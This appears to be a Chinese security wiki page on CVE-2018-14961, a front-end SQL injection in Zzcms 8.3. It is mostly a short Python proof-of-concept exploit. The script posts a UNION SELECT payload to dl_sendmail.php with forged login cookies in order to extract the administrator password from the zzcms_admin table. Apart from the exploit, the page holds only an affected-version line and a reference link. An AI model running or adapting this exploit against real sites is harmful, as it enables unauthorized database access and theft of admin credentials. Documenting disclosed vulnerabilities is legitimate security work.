menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 151-Zzcms chevron_right 004-CVE-2018-14961 Zzcms 8.3 前台sql注入.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    004-CVE-2018-14961 Zzcms 8.3 前台sql注入.md
    636 B / 2021-07-17 00:01:26
        # CVE-2018-14961 Zzcms 8.3 前台sql注入

### 一、漏洞简介

### 二、漏洞影响

Zzcms 8.3

### 三、复现过程


```python
#!/usr/bin/env python
#Author:Sublime
#coding:utf-8
import requests as req

url = "http://url:8080/dl/dl_sendmail.php"
cookies = {'UserName':'test','PassWord':'81dc9bdb52d04dc20036dbd8313ed055'}
data = { 'sql':'select email from zzcms_dl where id=-1 union select pass from zzcms_admin #'}

q = req.post(url,data,cookies=cookies,allow_redirects=False)
print q.status_code
print q.content
```

测试结果为:

![](images/15896918189264.png)


参考链接

https://www.anquanke.com/post/id/156660
    links
    file_download